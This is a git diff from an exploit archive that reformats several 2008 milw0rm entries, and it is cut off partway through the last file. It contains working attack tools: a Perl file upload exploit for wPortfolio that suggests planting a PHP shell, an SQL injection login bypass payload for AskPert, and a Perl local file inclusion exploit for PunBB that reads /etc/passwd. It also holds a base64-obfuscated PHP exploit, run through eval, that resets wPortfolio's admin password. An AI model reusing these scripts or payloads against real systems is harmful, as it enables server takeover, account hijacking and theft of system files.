@@ -1,74 +1,74 @@ -#!/usr/bin/perl - -# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit -# Script Name: wPortfolio 0.3 -# Download: http://sourceforge.net/project/downloading.php?group_id=244834&use_mirror=kent&filename=wPortfolio.zip&80791070 -# Vulnerability: Arbitrary File Upload -# Vulnerable page: /admin/upload_form.php -# * You can upload everything you want, why not a php shell? ^^ -# Author: Osirys -# Contact: osirys[at]live[dot]it -# Proud to be Italian -# Thx: athos - -use LWP::UserAgent; -use HTTP::Request::Common; - -my $path = "/admin/upload_form.php"; -my $d_fold = "/admin/tmp/"; -my($host,$file) = ($ARGV[0],$ARGV[1]); - -($host,$file) || help("-1"); -cheek($host) == 1 || help("-2"); -&banner; -my $url = $host.$path; - -my $ua = LWP::UserAgent->new; -my $re = $ua->request(POST $url, - Content_Type => 'form-data', - Content => [file_to_upload => [$file]] - ); - -if ($re->is_success) { - print "[+] Uploaded ! \n"; - print "[+] Link: ".$host.$d_fold.$file." \n"; -} -else { - print "[-] Upload failed ! \n"; -} - -sub cheek() { - my $host = $_[0]; - if ($host =~ /http:\/\/(.*)/) { - return 1; - } - else { - return 0; - } -} - -sub banner { - print "\n". - " ========================================== \n". - " wPortfolio 0.3 Arbitrary File Upload \n". - " Author: Osirys \n". - " osirys[at]live[dot]it \n". - " Proud to be italian \n". 
- " ========================================== \n\n"; -} - -sub help() { - my $error = $_[0]; - if ($error == -1) { - &banner; - print "\n[-] Cheek that you typed the hostname address and the local file to upload !\n"; - } - elsif ($error == -2) { - &banner; - print "\n[-] Bad hostname address !\n"; - } - print "[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n"; - exit(0); -} - -# milw0rm.com [2008-11-19] +#!/usr/bin/perl + +# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit +# Script Name: wPortfolio 0.3 +# Download: http://sourceforge.net/project/downloading.php?group_id=244834&use_mirror=kent&filename=wPortfolio.zip&80791070 +# Vulnerability: Arbitrary File Upload +# Vulnerable page: /admin/upload_form.php +# * You can upload everything you want, why not a php shell? ^^ +# Author: Osirys +# Contact: osirys[at]live[dot]it +# Proud to be Italian +# Thx: athos + +use LWP::UserAgent; +use HTTP::Request::Common; + +my $path = "/admin/upload_form.php"; +my $d_fold = "/admin/tmp/"; +my($host,$file) = ($ARGV[0],$ARGV[1]); + +($host,$file) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; +my $url = $host.$path; + +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url, + Content_Type => 'form-data', + Content => [file_to_upload => [$file]] + ); + +if ($re->is_success) { + print "[+] Uploaded ! \n"; + print "[+] Link: ".$host.$d_fold.$file." \n"; +} +else { + print "[-] Upload failed ! \n"; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub banner { + print "\n". + " ========================================== \n". + " wPortfolio 0.3 Arbitrary File Upload \n". + " Author: Osirys \n". + " osirys[at]live[dot]it \n". + " Proud to be italian \n". 
+ " ========================================== \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you typed the hostname address and the local file to upload !\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n"; + exit(0); +} + +# milw0rm.com [2008-11-19] diff --git a/platforms/php/webapps/7166.txt b/platforms/php/webapps/7166.txt index 7bd441ba6..747d4ad08 100755 --- a/platforms/php/webapps/7166.txt +++ b/platforms/php/webapps/7166.txt 
@@ -1,36 +1,36 @@ -##################WwW.TR-ShaRk.Co.cC################### -#AskPert (Auth bypass) SQL Injection Vulnerability -##################WwW.TR-ShaRk.Co.cC################### - - ##################WwW.TR-ShaRk.Co.cC################### - #[~] Author : TR-ShaRk - #[~] Msn : Starhack@tr-shark.org - #[~] Web : WwW.TR-ShaRk.Co.cC - #[~] I am Not Hacker - #[~] Greetz :FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER - #[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri - # - #[!] Script: http://www.w3matter.com/products/askpert - #[!] Google_Dork: Powered by AskPert - ##################WwW.TR-ShaRk.Co.cC################### - - - Go to ask/index.php?section=user&action=login - - Use following information to bypass login. - - Write any email Address as email address.It must to be in email format. - - For exapmple Starhack@TR-ShaRk.OrG - - For password use ' or ' 1=1 - - - #[~] LiveDemo: - http://www.w3matter.com/ask/index.php?section=user&action=login - - ##################WwW.TR-ShaRk.Co.cC################### - Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik | Ya Ezersin Yada Ezilirsin! - ##################WwW.TR-ShaRk.Co.cC################### - -# milw0rm.com [2008-11-19] +##################WwW.TR-ShaRk.Co.cC################### +#AskPert (Auth bypass) SQL Injection Vulnerability +##################WwW.TR-ShaRk.Co.cC################### + + ##################WwW.TR-ShaRk.Co.cC################### + #[~] Author : TR-ShaRk + #[~] Msn : Starhack@tr-shark.org + #[~] Web : WwW.TR-ShaRk.Co.cC + #[~] I am Not Hacker + #[~] Greetz :FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER + #[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri + # + #[!] Script: http://www.w3matter.com/products/askpert + #[!] Google_Dork: Powered by AskPert + ##################WwW.TR-ShaRk.Co.cC################### + + + Go to ask/index.php?section=user&action=login + + Use following information to bypass login. 
+ + Write any email Address as email address.It must to be in email format. + + For exapmple Starhack@TR-ShaRk.OrG + + For password use ' or ' 1=1 + + + #[~] LiveDemo: + http://www.w3matter.com/ask/index.php?section=user&action=login + + ##################WwW.TR-ShaRk.Co.cC################### + Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik | Ya Ezersin Yada Ezilirsin! + ##################WwW.TR-ShaRk.Co.cC################### + +# milw0rm.com [2008-11-19] diff --git a/platforms/php/webapps/7168.pl b/platforms/php/webapps/7168.pl index 56d379a5b..730317a59 100755 --- a/platforms/php/webapps/7168.pl +++ b/platforms/php/webapps/7168.pl 
@@ -1,117 +1,117 @@ -#!/usr/bin/perl - -=about - - PunBB (PunPortal 0.1) Local File Inclusion Exploit - -------------------------------------------------- - by athos - staker[at]hotmail[dot]it - download mod http://www.punres.org/download.php?id=1108 - download cms http://punbb.org - - register globals = 1 - magic quotes gcp = 1 - - - - File (include/login.php) - - 1. <?php - 2. - 3. // Show login if not logged in - 4. if($pun_user['is_guest']) - 5. { - 6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element))) - 7. { - 8. - 9. // Load the language files - 10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php'; - 11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php'; - - - $pun_user['is_guest'] isn't declared - $pun_user['language'] isn't declared - - include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00 - - how to fix?use the latest version (2.0) - - Usage: perl punbb.pl localhost/cms - -=cut - - -use strict; -use warnings; -use IO::Socket; - - -my $html = undef; -my $site = $ARGV[0] or &help; -my @take = split /\//,$site; - -my ($host,$path) = @take; - -if($site =~ /http:\/\/(.+?)/i) { - print STDOUT "Invalid URL\n"; - exit; -} - -print STDOUT "Local File (ex: ../../etc/passwd)\n"; -print STDOUT "Local File: "; - -chomp(my $file = <STDIN>); - -if(not defined($file)) { - print STDOUT "File Not Defined!\n"; - exit; -} - - -my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]="; - -my $sock = new IO::Socket::INET( - PeerAddr => $host, - PeerPort => 80, - Proto => 'tcp', - Timeout => 6, - ) or die $!; - -my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n". - "Host: $host\r\n". - "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n". - "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n". - "Accept-Language: en-us,en;q=0.5\r\n". - "Accept-Encoding: gzip,deflate\r\n". 
- "Connection: close\r\n\r\n"; - -$sock->send($data); - -while(<$sock>) { - $html .= $_; -} - -if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) { - print STDOUT "Exploit Failed!\n"; - exit; -} -else { - my $name = int(rand(999)).'.txt'; - - open(FILE,">",$name); - print FILE $html; - close(FILE); - - print STDOUT "Exploit Successfully!\n"; - print STDOUT "$name saved!\n"; - exit; -} - - -sub help { - print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n". - "by athos - staker[at]hotmail[dot]it\n". - "Usage: perl $0 [host/path]\n"; - exit; -} - -# milw0rm.com [2008-11-20] +#!/usr/bin/perl + +=about + + PunBB (PunPortal 0.1) Local File Inclusion Exploit + -------------------------------------------------- + by athos - staker[at]hotmail[dot]it + download mod http://www.punres.org/download.php?id=1108 + download cms http://punbb.org + + register globals = 1 + magic quotes gcp = 1 + + + + File (include/login.php) + + 1. <?php + 2. + 3. // Show login if not logged in + 4. if($pun_user['is_guest']) + 5. { + 6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element))) + 7. { + 8. + 9. // Load the language files + 10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php'; + 11. 
require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php'; + + + $pun_user['is_guest'] isn't declared + $pun_user['language'] isn't declared + + include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00 + + how to fix?use the latest version (2.0) + + Usage: perl punbb.pl localhost/cms + +=cut + + +use strict; +use warnings; +use IO::Socket; + + +my $html = undef; +my $site = $ARGV[0] or &help; +my @take = split /\//,$site; + +my ($host,$path) = @take; + +if($site =~ /http:\/\/(.+?)/i) { + print STDOUT "Invalid URL\n"; + exit; +} + +print STDOUT "Local File (ex: ../../etc/passwd)\n"; +print STDOUT "Local File: "; + +chomp(my $file = <STDIN>); + +if(not defined($file)) { + print STDOUT "File Not Defined!\n"; + exit; +} + + +my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]="; + +my $sock = new IO::Socket::INET( + PeerAddr => $host, + PeerPort => 80, + Proto => 'tcp', + Timeout => 6, + ) or die $!; + +my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n". + "Host: $host\r\n". + "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n". + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n". + "Accept-Language: en-us,en;q=0.5\r\n". + "Accept-Encoding: gzip,deflate\r\n". + "Connection: close\r\n\r\n"; + +$sock->send($data); + +while(<$sock>) { + $html .= $_; +} + +if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) { + print STDOUT "Exploit Failed!\n"; + exit; +} +else { + my $name = int(rand(999)).'.txt'; + + open(FILE,">",$name); + print FILE $html; + close(FILE); + + print STDOUT "Exploit Successfully!\n"; + print STDOUT "$name saved!\n"; + exit; +} + + +sub help { + print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n". + "by athos - staker[at]hotmail[dot]it\n". + "Usage: perl $0 [host/path]\n"; + exit; +} + +# milw0rm.com [2008-11-20] diff --git a/platforms/php/webapps/7170.php b/platforms/php/webapps/7170.php index bd400e37e..f3b2180dc 100755 
--- a/platforms/php/webapps/7170.php
+++ b/platforms/php/webapps/7170.php
@@ -1,121 +1,121 @@ -<?php -/* -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - wPortfolio <= 0.3 Admin Password Changing Exploit -============================================================================== - - [»] Script: [ wPortfolio <= 0.3 ] - [»] Language: [ PHP ] - [»] Webpage: [ http://sourceforge.net/projects/wportfolio/ ] - [»] Type: [ OS ] - [»] Report-Date: [ 20.11.2008 ] - [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] - - -===[ XPL ]===*/ - - - $GNK = "ZWNobyAiPFRJVExFPndQb3J0Zm9saW8gPD0gMC4zIEFkbWluIFBhc3N3b3JkIENoYW5naW5nIEV4". - "cGxvaXQgfCBCeTogRzROMEs8L1RJVExFPiI7DQokRzROMEsgPSA8PDxFT0cNCj09PT09PT09PT09". - "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". - "PT09PT09PT09PQ0KICAgICAgICAgICAgICAgICAgICAgIF8gICAgICBfICAgICAgIF8gICAgICAg". - "ICAgXyAgICAgIF8gICBfIA0KICAgICAgICAgICAgICAgICAgICAgLyBcICAgIHwgfCAgICAgfCB8". - "ICAgICAgICAvIFwgICAgfCB8IHwgfA0KICAgICAgICAgICAgICAgICAgICAvIF8gXCAgIHwgfCAg". - "ICAgfCB8ICAgICAgIC8gXyBcICAgfCB8X3wgfA0KICAgICAgICAgICAgICAgICAgIC8gX19fIFwg". - "IHwgfF9fXyAgfCB8X19fICAgLyBfX18gXCAgfCAgXyAgfA0KICAgSU4gVEhFIE5BTUUgT0YgL18v". - "ICAgXF9cIHxfX19fX3wgfF9fX19ffCAvXy8gICBcX1wgfF98IHxffA0KICAgICAgICAgICAgICAg". - "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQo9PT09PT09". - "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". - "PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAgICAgICBfX19fICAgXyAgXyAgICAgXyAg". 
- "IF8gICAgX19fICAgIF8gIF9fDQogICAgICAgICAgICAgICAgICAgICAvIF9fX3wgfCB8fCB8ICAg". - "fCBcIHwgfCAgLyBfIFwgIHwgfC8gLw0KICAgICAgICAgICAgICAgICAgICB8IHwgIF8gIHwgfHwg". - "fF8gIHwgIFx8IHwgfCB8IHwgfCB8ICcgLyANCiAgICAgICAgICAgICAgICAgICAgfCB8X3wgfCB8". - "X18gICBffCB8IHxcICB8IHwgfF98IHwgfCAuIFwgDQogICAgICAgICBlWHBsbyF0IEJ5ICBcX19f". - "X3wgICAgfF98ICAgfF98IFxffCAgXF9fXy8gIHxffFxfXA0KDQo9PT09PT09PT09PT09PT09PT09". - "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". - "PT0NCgl3UG9ydGZvbGlvIDw9IDAuMyBBZG1pbiBQYXNzd29yZCBDaGFuZ2luZyBFeHBsb2l0DQo9". - "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". - "PT09PT09PT09PT09PT09PT09PT0NCg0KRU9HOw0KZWNobyAiPHByZT4iLiRHNE4wSy4iPC9wcmU+". - "IjskRk9STSA9ICI8YnIgLz48Rk9STSBhY3Rpb249XCIiLiRfU0VSVkVSWyJQSFBfU0VMRiJdLiJc". - "IiBtZXRob2Q9XCJQT1NUXCI+IjskRk9STS49IDw8PEZGRg0KICAgIDxQIHN0eWxlPSJ3aWR0aDog". - "MzAwcHg7Y2xlYXI6IGxlZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhweCAwO3BhZGRpbmct". - "bGVmdDogMTU1cHg7Ym9yZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQogICAgPExBQkVMIHN0". - "eWxlPSJmb250LXdlaWdodDogYm9sZDtmbG9hdDogbGVmdDttYXJnaW4tbGVmdDogLTE1NXB4O3dp". - "ZHRoOjE1MHB4OyIgZm9yPSJNU0RHTksiPiBXZWJzaXRlIDogJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i". - "c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQog". - "ICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFt". - "ZT0iTVNER05LIiBpZD0iTVNER05LIj48YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2Vp". - "Z2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBm". - "b3I9IlBBVEgiPlBhdGg6ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1svd1BvcnRmb2xp". - "b108L0xBQkVMPg0KICAgICAgICAgICAgICA8SU5QVVQgc3R5bGU9IndpZHRoOiAxODBweDsiIHR5". - "cGU9InRleHQiIG5hbWU9IlBBVEgiIGlkPSJQQVRIIiB2YWx1ZT0iLyI+PEJSPg0KICAgIDxQIHN0". - "eWxlPSJ3aWR0aDogMzAwcHg7Y2xlYXI6IGxlZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhw". - "eCAwO3BhZGRpbmctbGVmdDogMTU1cHg7Ym9yZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQoJ". 
- "PExBQkVMIHN0eWxlPSJmb250LXdlaWdodDogYm9sZDtmbG9hdDogbGVmdDttYXJnaW4tbGVmdDog". - "LTE1NXB4O3dpZHRoOjE1MHB4OyIgZm9yPSJucHciPiBOZXcgUGFzc3dvcmQgOiA8L0xBQkVMPg0K". - "ICAgICAgICAgICAgICA8SU5QVVQgc3R5bGU9IndpZHRoOiAxODBweDsiIHR5cGU9InRleHQiIG5h". - "bWU9Im5wdyIgaWQ9Im5wdyI+PEJSPg0KCTxQIHN0eWxlPSJ3aWR0aDogMzAwcHg7Y2xlYXI6IGxl". - "ZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhweCAwO3BhZGRpbmctbGVmdDogMTU1cHg7Ym9y". - "ZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQogICAgPElOUFVUIHR5cGU9InN1Ym1pdCIgbmFt". - "ZT0ic3VibWl0IiB2YWx1ZT0iQ2hhbmdlIGl0ISI+IDxJTlBVVCB0eXBlPSJyZXNldCI+DQogICAg". - "PC9QPg0KIDwvRk9STT4NCkZGRjsNCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKXskbmV3X3B3". - "ZD1tZDUoJF9QT1NUWyducHcnXSk7JHBvc3Q9InNpdGVuYW1lPS0lMjB3ZWJwb3J0Zm9saW8lMjAt". - "Jl9zdGF0dXNiYXI9c3RhdHVzJTIwYmFyJmJhbm5lcj1jb3B5cmlnaHQmZW1haWw9bWFpbC5nYW5v". - "ayU0MGdtYWlsLmNvbSZwYXNzd29yZD0iLiRuZXdfcHdkLiImcGFzc3dvcmRfcmV0eXBlPSIuJG5l". - "d19wd2QuIlxyXG4iOyRqb2tlID0gIlBPU1QgLyIuJF9QT1NUWyJQQVRIIl0uIi9hZG1pbi91c2Vy". - "aW5mby5waHA/YWN0aW9uPWFjY291bnRfc2F2ZSBIVFRQLzEuMVxyXG5Ib3N0OiAiLiRfUE9TVFsi". - "TVNER05LIl0uIlxyXG5Vc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93". - "cyBOVCA1LjE7IGVuLVVTOyBydjoxLjkpIEdlY2tvLzIwMDgwNTI5MDYgRmlyZWZveC8zLjBcclxu". - "S2VlcC1BbGl2ZTogMzAwXHJcbkNvbm5lY3Rpb246IGtlZXAtYWxpdmVcclxuQ29udGVudC1UeXBl". - "OiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuQ29udGVudC1MZW5ndGg6IDE5". - "MFxyXG5cclxuIi4kcG9zdDskcmVzID0gIiI7JGF0dGFjayA9IGZzb2Nrb3BlbigkX1BPU1RbIk1T". - "REdOSyJdLCI4MCIsJGVycm5vLCAkZXJyc3RyLCA1MCk7aWYoISRhdHRhY2spe2VjaG8oIjxiciAv". - "PldURiwgZXJyIzogKCRlcnJubykuJGVycnN0ciIpO3JldHVybjt9ZWNobygiPHNwYW4gc3R5bGU9". - "XCJmb250Om5vcm1hbCA4cHQgdGFob21hO1wiPlsrXSA8Yj5Db25uZWN0ZWQuLi48YnIvPjwvYj5b". - "K10gPGI+U2VuZGluZyByZXF1ZXN0Li4uPGJyLz48L2I+Iik7ZndyaXRlKCRhdHRhY2ssJGpva2Up". - "O3doaWxlKCFmZW9mKCRhdHRhY2spKXskcmVzLj1mZ2V0cygkYXR0YWNrKTt9ZmNsb3NlKCRhdHRh". - "Y2spO2lmIChzdHJpc3RyKCRyZXMsICJzYXZlZCIpKXtlY2hvICJbK108Yj4gRXhwbG9pdGVkICEg". 
- "LCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3JkIGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAv". - "PiAgICAgWytdIC4uLjxiciAvPiAgICAgWytdIDxiPm5ldyBwYXNzd29yZDo8L2I+ICIuJF9QT1NU". - "WyducHcnXS4iPGJyIC8+ICAgICBbK108Yj4gYWRtaW4gcGFuZWw6PC9iPiBodHRwOi8vIi4kX1BP". - "U1RbIk1TREdOSyJdLiRfUE9TVFsiUEFUSCJdLiIvYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJy". - "IC8+PGJyIC8+PGJyIC8+PGJyIC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21h". - "O2NvbG9yOiNDQ0M7XCI+RXhwbG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8g". - "IlsrXTxiPiBPb3BzLCBzcnksIG5vdCB2dWxuLi4uITwvYj48YnIgLz5bIV0gPGk+ZG91YmxlIGNo". - "ZWNrIHlvdXIgaW5wdXQuLi48L2k+Ijt9Zmx1c2goKTt9ZWxzZXtlY2hvJEZPUk07fQ0K"; - eval(base64_decode($GNK)); - -/* -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 <Tornado2800[at]gmail.com> // bedone in nemishe :D - [»] Hussain-X <darkangel_g85[at]yahoo.com> // Jazakallah... - [»] Str0ke //Hey Brotha keep rocking on ;) - [»] Saudi-L0rd,Sakab... - [»] SMN,MSD-KiD,SED,AMD,MSN... - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... - -=============================================================================== -exit(); -===============================================================================*/ -?> - -# milw0rm.com [2008-11-20] +<?php +/* +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . 
\ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + wPortfolio <= 0.3 Admin Password Changing Exploit +============================================================================== + + [»] Script: [ wPortfolio <= 0.3 ] + [»] Language: [ PHP ] + [»] Webpage: [ http://sourceforge.net/projects/wportfolio/ ] + [»] Type: [ OS ] + [»] Report-Date: [ 20.11.2008 ] + [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] + + +===[ XPL ]===*/ + + + $GNK = "ZWNobyAiPFRJVExFPndQb3J0Zm9saW8gPD0gMC4zIEFkbWluIFBhc3N3b3JkIENoYW5naW5nIEV4". + "cGxvaXQgfCBCeTogRzROMEs8L1RJVExFPiI7DQokRzROMEsgPSA8PDxFT0cNCj09PT09PT09PT09". + "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". + "PT09PT09PT09PQ0KICAgICAgICAgICAgICAgICAgICAgIF8gICAgICBfICAgICAgIF8gICAgICAg". + "ICAgXyAgICAgIF8gICBfIA0KICAgICAgICAgICAgICAgICAgICAgLyBcICAgIHwgfCAgICAgfCB8". + "ICAgICAgICAvIFwgICAgfCB8IHwgfA0KICAgICAgICAgICAgICAgICAgICAvIF8gXCAgIHwgfCAg". + "ICAgfCB8ICAgICAgIC8gXyBcICAgfCB8X3wgfA0KICAgICAgICAgICAgICAgICAgIC8gX19fIFwg". + "IHwgfF9fXyAgfCB8X19fICAgLyBfX18gXCAgfCAgXyAgfA0KICAgSU4gVEhFIE5BTUUgT0YgL18v". + "ICAgXF9cIHxfX19fX3wgfF9fX19ffCAvXy8gICBcX1wgfF98IHxffA0KICAgICAgICAgICAgICAg". + "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQo9PT09PT09". + "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". + "PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAgICAgICBfX19fICAgXyAgXyAgICAgXyAg". + "IF8gICAgX19fICAgIF8gIF9fDQogICAgICAgICAgICAgICAgICAgICAvIF9fX3wgfCB8fCB8ICAg". + "fCBcIHwgfCAgLyBfIFwgIHwgfC8gLw0KICAgICAgICAgICAgICAgICAgICB8IHwgIF8gIHwgfHwg". + "fF8gIHwgIFx8IHwgfCB8IHwgfCB8ICcgLyANCiAgICAgICAgICAgICAgICAgICAgfCB8X3wgfCB8". + "X18gICBffCB8IHxcICB8IHwgfF98IHwgfCAuIFwgDQogICAgICAgICBlWHBsbyF0IEJ5ICBcX19f". + "X3wgICAgfF98ICAgfF98IFxffCAgXF9fXy8gIHxffFxfXA0KDQo9PT09PT09PT09PT09PT09PT09". + "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". 
+ "PT0NCgl3UG9ydGZvbGlvIDw9IDAuMyBBZG1pbiBQYXNzd29yZCBDaGFuZ2luZyBFeHBsb2l0DQo9". + "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". + "PT09PT09PT09PT09PT09PT09PT0NCg0KRU9HOw0KZWNobyAiPHByZT4iLiRHNE4wSy4iPC9wcmU+". + "IjskRk9STSA9ICI8YnIgLz48Rk9STSBhY3Rpb249XCIiLiRfU0VSVkVSWyJQSFBfU0VMRiJdLiJc". + "IiBtZXRob2Q9XCJQT1NUXCI+IjskRk9STS49IDw8PEZGRg0KICAgIDxQIHN0eWxlPSJ3aWR0aDog". + "MzAwcHg7Y2xlYXI6IGxlZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhweCAwO3BhZGRpbmct". + "bGVmdDogMTU1cHg7Ym9yZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQogICAgPExBQkVMIHN0". + "eWxlPSJmb250LXdlaWdodDogYm9sZDtmbG9hdDogbGVmdDttYXJnaW4tbGVmdDogLTE1NXB4O3dp". + "ZHRoOjE1MHB4OyIgZm9yPSJNU0RHTksiPiBXZWJzaXRlIDogJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i". + "c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQog". + "ICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFt". + "ZT0iTVNER05LIiBpZD0iTVNER05LIj48YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2Vp". + "Z2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBm". + "b3I9IlBBVEgiPlBhdGg6ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1svd1BvcnRmb2xp". + "b108L0xBQkVMPg0KICAgICAgICAgICAgICA8SU5QVVQgc3R5bGU9IndpZHRoOiAxODBweDsiIHR5". + "cGU9InRleHQiIG5hbWU9IlBBVEgiIGlkPSJQQVRIIiB2YWx1ZT0iLyI+PEJSPg0KICAgIDxQIHN0". + "eWxlPSJ3aWR0aDogMzAwcHg7Y2xlYXI6IGxlZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhw". + "eCAwO3BhZGRpbmctbGVmdDogMTU1cHg7Ym9yZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQoJ". + "PExBQkVMIHN0eWxlPSJmb250LXdlaWdodDogYm9sZDtmbG9hdDogbGVmdDttYXJnaW4tbGVmdDog". + "LTE1NXB4O3dpZHRoOjE1MHB4OyIgZm9yPSJucHciPiBOZXcgUGFzc3dvcmQgOiA8L0xBQkVMPg0K". + "ICAgICAgICAgICAgICA8SU5QVVQgc3R5bGU9IndpZHRoOiAxODBweDsiIHR5cGU9InRleHQiIG5h". + "bWU9Im5wdyIgaWQ9Im5wdyI+PEJSPg0KCTxQIHN0eWxlPSJ3aWR0aDogMzAwcHg7Y2xlYXI6IGxl". + "ZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhweCAwO3BhZGRpbmctbGVmdDogMTU1cHg7Ym9y". + "ZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQogICAgPElOUFVUIHR5cGU9InN1Ym1pdCIgbmFt". 
